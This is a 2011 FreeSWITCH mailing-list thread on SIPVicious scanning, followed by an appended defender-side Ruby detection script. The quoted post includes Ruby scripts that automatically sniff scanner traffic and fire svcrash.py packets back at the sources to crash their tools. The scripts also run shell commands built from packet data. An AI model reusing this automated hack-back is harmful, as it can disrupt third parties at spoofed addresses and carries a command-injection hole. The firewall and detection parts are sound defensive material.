[Freeswitch-users] SPIT attack and how to strike back

Brian West brian at freeswitch.org
Thu Apr 21 05:22:44 MSD 2011


Or 

iptables -I INPUT -j DROP -p udp --dport 5060 -m string --string "friendly-scanner" --algo bm

/b

On Apr 20, 2011, at 6:00 PM, Peter P GMX wrote:

> Hello all,
> 
> I would like to share this with you as you may have also been affected
> by this threat.
> 
> Yesterday we received a SPIT attack to our Freeswitch servers. We had
> about 50 register requests/sec. We noticed this as we saw a slight
> increase in the load of the Freeswitch servers. Fortunately Freeswitch
> can handle a huge amount of register requests so we had no denial of
> service.
> 
> You can identify this attack by finding the following in the Register
> message:
>    User-Agent: friendly-scanner
> 
> How to get rid of it:
> The attacker used Sipvicious (friendly-scanner). Sipvicious itself has a
> nice tool "svcrash.py" which can send a malformed packet back to the
> attacker which crashes their own Sipvicious tool. You can issue this tool by
>  python svcrash.py -d <host of attacker> -p <port of attacker>
> You will need port 5060 on your machine to work. But there is also a
> workaround for that. svcrash.py will show how to overcome this if your
> port 5060 is not available.
> Download it here
> http://sipvicious.googlecode.com/files/sipvicious-0.2.6.tar.gz and
> unpack it to a folder of your choice.
> 
> I wrote a small Ruby script to send the packet back to a port range, as
> our attacker used some dozens of ports to send.
> Here is the script (Install ruby first by "apt-get install ruby" e.g. on
> Debian based systems). Put it into the sipvicious directory
> kill_ports.rb:
> 
> #!/usr/bin/env ruby
> host=ARGV[0]
> start_port=ARGV[1].to_i
> end_port=ARGV[2].to_i
> start_port.upto(end_port) do |port|
>  cmd="python svcrash.py -d #{host} -p #{port}"
>  p cmd
>  erg=`#{cmd}`
>  p erg
> end
> 
> You now can run it by
> ./kill_ports.rb <ip> <from_port> <to_port>
> 
> By using this tool we got rid of most of the SPIT messages. But after a
> while they started again to attack us from different ports.
> 
> The next step is: Why not automate this by trying to identify host and
> port automatically and send back the svcrash.py packet to the sender's port?
> 
> First install the pcap library
>    apt-get install libpcap-dev libpcap-ruby
> 
> Then I wrote the following tool to automate this, it makes use of the
> kill_ports.rb above:
> strike_back.rb:
> 
> #!/usr/bin/env ruby
> # I used some code from http://snippets.dzone.com/posts/show/5931
> require 'pcaplet'
> require 'logger'
> require 'timeout'
> @timeout=3600 # max runtime: 1 hour
> 
> @logfile='strike_back.log'
> class AuditLogger < Logger
>  def format_message(severity, timestamp, progname, msg)
>    puts msg
>    "#{msg}\n"
>  end
> end
> 
> logfile = File.open(@logfile, 'a')
> LOGGER = AuditLogger.new(logfile)
> LOGGER.level = Logger::INFO
> search="friendly-scanner"
> puts "Searching for '#{search}' in SIP packets"
> $network = Pcaplet.new('-s 1500')
> $filter = Pcap::Filter.new('udp and dst port 5060', $network.capture)
> $network.add_filter($filter)
> puts "Logfile: #{@logfile}"
> puts "Starting capture..."
> begin
>  Timeout.timeout(@timeout) do # 3600 sec
>    for p in $network
>        header = "#{Time.now.strftime("%Y-%m-%d %H:%M:%S")} #{p.src}:#{p.sport} => #{p.dst}:#{p.dport}"
>        if $filter =~ p
>            #puts "simple search"
>            if p.udp_data.index(search)
>              LOGGER.info "Kill Friendly scanner #{p.src} with Source Port #{p.sport}"
>              cmd="./kill_ports.rb #{p.src} #{p.sport} #{p.sport}"
>              erg=`#{cmd}`
>              p erg
>              LOGGER.info header
>              LOGGER.info p.udp_data
>            end
>        end
>    end
>  end
> rescue Timeout::Error
>  logfile.flush
>  puts "Timeout - finished."
> end
> 
> There may be a better way to code this, but at least it worked. After
> about 15min the number of attacks went to 0.
> 
> Disclaimer: You can damage other systems by using these tools. So be
> careful and use at your own risk. Do not use this tool for attacking
> other systems!
> 
> Best regards
> Peter
> 
> _______________________________________________
> FreeSWITCH-users mailing list
> FreeSWITCH-users at lists.freeswitch.org
> http://lists.freeswitch.org/mailman/listinfo/freeswitch-users
> UNSUBSCRIBE:http://lists.freeswitch.org/mailman/options/freeswitch-users
> http://www.freeswitch.org
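As an added example, not code from either post: a defender-side Ruby script that does the detection both messages rely on (the "friendly-scanner" User-Agent, plus a REGISTER-rate check for scanners that change their User-Agent) over captured UDP/5060 payloads and turns the verdict into per-source iptables DROP rules instead of sending anything back. The packet record shape ({src:, ts:, data:}), the RATE_LIMIT threshold and the SAMPLE traffic are constructed assumptions, not taken from the thread.

```ruby
# Added example, not code from the thread: flag SIPVicious-style REGISTER traffic
# in captured UDP payloads and emit per-source iptables DROP rules. Packet shape
# ({src:, ts:, data:}), RATE_LIMIT and SAMPLE are constructed here.
SCANNER_UA = 'friendly-scanner'  # User-Agent named in the thread
RATE_LIMIT = 20                  # REGISTERs per source per second (assumed)

# Parse a SIP request start line and headers; nil when the payload is not SIP.
def parse_sip(payload)
  lines = payload.to_s.split("\r\n\r\n", 2).first.to_s.split("\r\n")
  m = lines.shift.to_s.match(%r{\A([A-Z]+) \S+ SIP/2\.0\z})
  return nil unless m
  headers = {}
  lines.each do |l|
    name, value = l.split(':', 2)
    headers[name.strip.downcase] = value.strip if value
  end
  { method: m[1], headers: headers }
end

# Return { source_ip => reason } for sources to block: a scanner User-Agent on
# any SIP request, or more than rate_limit REGISTERs from one source in a second.
def classify(packets, rate_limit: RATE_LIMIT)
  flagged = {}
  per_second = Hash.new(0)
  packets.each do |pkt|
    sip = parse_sip(pkt[:data])
    next unless sip
    ua = sip[:headers].fetch('user-agent', '')
    flagged[pkt[:src]] ||= :scanner_user_agent if ua.downcase.include?(SCANNER_UA)
    next unless sip[:method] == 'REGISTER'
    n = (per_second[[pkt[:src], pkt[:ts].to_i]] += 1)
    flagged[pkt[:src]] ||= :register_flood if n > rate_limit
  end
  flagged
end

# Per-source rules, narrower than the thread's string match, which drops every
# UDP/5060 packet containing the User-Agent text whoever sent it.
def iptables_rules(flagged)
  flagged.keys.map { |ip| "iptables -I INPUT -s #{ip} -p udp --dport 5060 -j DROP" }
end

def register(src, ua)  # minimal constructed REGISTER request
  "REGISTER sip:pbx.example.net SIP/2.0\r\nVia: SIP/2.0/UDP #{src}:5060;branch=z9hG4bK1\r\n" \
  "From: <sip:100@pbx.example.net>\r\nCSeq: 1 REGISTER\r\nUser-Agent: #{ua}\r\nContent-Length: 0\r\n\r\n"
end
SAMPLE = [
  { src: '203.0.113.5',  ts: 100.1, data: register('203.0.113.5', 'friendly-scanner') },
  { src: '198.51.100.7', ts: 100.2, data: register('198.51.100.7', 'ExamplePhone/1.0') },
  { src: '198.51.100.7', ts: 100.3, data: 'not a SIP message' },
] + (1..25).map { |i| { src: '192.0.2.9', ts: 100 + i / 100.0, data: register('192.0.2.9', 'ExamplePhone/1.0') } }
puts iptables_rules(classify(SAMPLE)) if $PROGRAM_NAME == __FILE__
```

Feeding real packets in (for example from the pcaplet loop in the quoted script) only requires building the same {src:, ts:, data:} records from p.src, Time.now and p.udp_data.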
